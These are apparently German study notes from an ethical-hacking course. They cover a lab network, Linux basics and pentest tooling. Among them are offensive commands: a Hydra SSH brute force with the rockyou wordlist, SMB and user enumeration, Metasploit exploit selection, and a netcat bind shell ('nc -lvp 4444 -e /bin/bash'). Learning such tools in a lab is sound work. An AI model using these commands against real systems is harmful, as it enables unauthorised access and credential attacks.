Heise Hacking Kurs LinkedIn Learning
Testumgebung:
Windows-Rechner:
IP-Adresse: 10.1.1.129
MAC-Adresse: BA-F0-EC-81-03-92
Kali-Linux:
IP-Adresse: 10.1.1.128
MAC-Adresse: FE-3A-E0-10-0E-35
Serverschutz Bausteine von BSI
Schichtenmodel TCP/IP
Infos
Generell
127.0.0.1 = localhost : Jedes Paket geht wieder zurück auf den sendenden Rechner
Wireshark
ARP = Address Resolution Protocol dient dazu MAC adressen auszulesen
Befehle:
Befehl | Beispiel | |
sipcalc | sipcalc 192.168.178.0/24 | Stellt die Subnetzmaske mit den IP-Adressen dar |
ls -la | grep | ls -la | grep go | Gibt dann nur Inhalte wieder, die go enthalten |
find | find . | Gibt alles aus |
find . | grep | find . | grep go | Findet alles in Laufwerk und gibt aber nur inhalte mit go zurück |
locate | Suche über die gesamte Festplatte | |
pwd | pwd | Print Working Directory - Aktuelles laufwerk anzeigen |
whoami | whoami | Aktueller Benutzer |
cd | cd | Springt direkt ins homeverzeichnis |
ps aux | Zeigt Prozesse an | |
ps aux | grep apache2 | Zeigt alles mit apache2 an | |
cat | Zeigt dateiinhalt an | |
cat | cat > hackingskills cat >> hackingskills |
Erstellt eine Datei direkt |
grep | sudo cat /etc/config-datei | grep output |
Sucht nach dem String Output |
nl |
zeigt den inhalt einer datei mit den Zeilennummern an. Kann auch mit grep verbunden werden |
|
sed |
|
|
netstat |
|
|
ip |
|
|
dig | dig linkedin.com ns |
Zeigt die Nameserver an |
dig li |
|
Linux Hilfe
aircrack-ng | aircrack-ng --help | more |
Zeigt die HIlfe an mit jeder seite q für Beenden |
man aircrack-ng | Zeigt das Manual an |
Finden in Linux
locate
- locate apache2.conf
zeit an wo dateien liegen. (Datenbank aktualisieren: updatedb
)whereis
- whereis nmap
which
- which nmap
find
- find / -type f -name apache2
Zeigt f = Dateien an die im / Homeverzeichnis liegen. Mit sudo werden alle dateien gefunden. find
- find /etc -tpye -f -name apache2.*
findet alles in etc mit dem Namen apache2
Berechtigungen
-rw-r--r-- 1 dapelza dapelza 0 31. Jan 10:19 test.txt
Berechtigung User Gruppe Größe Datum Dateiname
3 Bits Besitzer 3 Bits Gruppe 3 Bits alle anderen
Bit | Berechtigung | |
r | Read | |
w | Write | |
x | Execute (Ausführen) | |
Berechtigung ändern | ||
chmod +x test.txt | Alle dürfen ausführen | |
chmod -x test.txt | Berechtiung nehmen | |
chmod u+x test.txt | Nur der User darf die Datei ausführen | |
chmod g+x test.txt | Gruppe darf ausführen |
Phasen des Hacking
Passives Scannen
hunter.io
Email-Adressen von Unternehmen herausfinden
Burp Suite
Zum Auslesen von Http Code über einen Proxy
DefaultCreds-cheat-sheet
Webseiten überprüfen
Aktives Scannen
Nmap
Parameter | Kommentar |
nmap -sn 10.1.1.0/24 |
Pingt einen ip-Bereich und gibt die Teilnehmer wieder. |
nmap 10.1.1.136 -v | Vorher schon ergebnisse Anzeigen |
nmap 10.1.1.136 -oN /pfad/zur/datei | speichert die ergebnisse in einer Datei ab |
nmap 10.1.1.136 -p40,21 | können bestimmte Ports gescannt werden |
nmap 10.1.1.136 -sU | Scannta auch udap |
nmap 10.1.1.136 -A | Führt scripte aus |
Dirbuster
Scannt nach unterverzeichnisen auf einer Domain
Im internet nach Exploits suchen
Beispiel: exploitdb Wordpress 4.9
searchsploit
findet schwachstellen in einer Software
smbmap
findet schwachstellen in der SMB freigabe
smbmap -u '' -H 10.0.2.9
-u '' = User aber nicht angeben.
Enum4Linux
findet usernamen
enum4linux 10.1.1.150 -U
Hydra
Brutforce auf ssh oder smb
hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.1.1.12 -t 4
Exploit-Datenbanken
www.exploit-db.com
www.cvedetails.com
Exploits
Metasploit framework
msfconsole
Bevor man mit msf los legt:
Datenbank starten
sudo msfdb init
Postgressql dienst starten
sudo systemctl start postgresql
Metasploit verwenden
search proftp
use exploit/windwos/ftp/proftp_banner
oder
use 4
danach:
options
set Rhosts
show payloads
show targets
Netcat
Opfer
nc -lvp 4444
- Damit kann man generell auf eine Verbindung lauschen
nc -lvp 4444 -e /bin/bash
- Würde bei Verbindung eine Shell starten
Angreifer
nc 10.1.1.138 4444
- Stellt eine Verbindung zum lauschenden Opfer auf dem Port 4444 her
Pentest MOnkey reverse shell
Nessus
Tools
SED
Suchen und ersetzen
Mit suchen und ersetzen kann man in einer Datei Wörter ersetzen.
sudo sed s/mysql/MySQL/g /etc/irgendwas.conf > igendwasneu.conf # s = substizution: mysql wird durch MySQL ersetzt in der ganzen Datei (/g)
Netstat
netstat -r
Zeigt die Netzwerkkarte das Standardgateway an.
IP
ip a sh # sh = Show
# Ip Adresse ändern
ifconfig eth0 10.1.1.109 netmask 255.255.255.0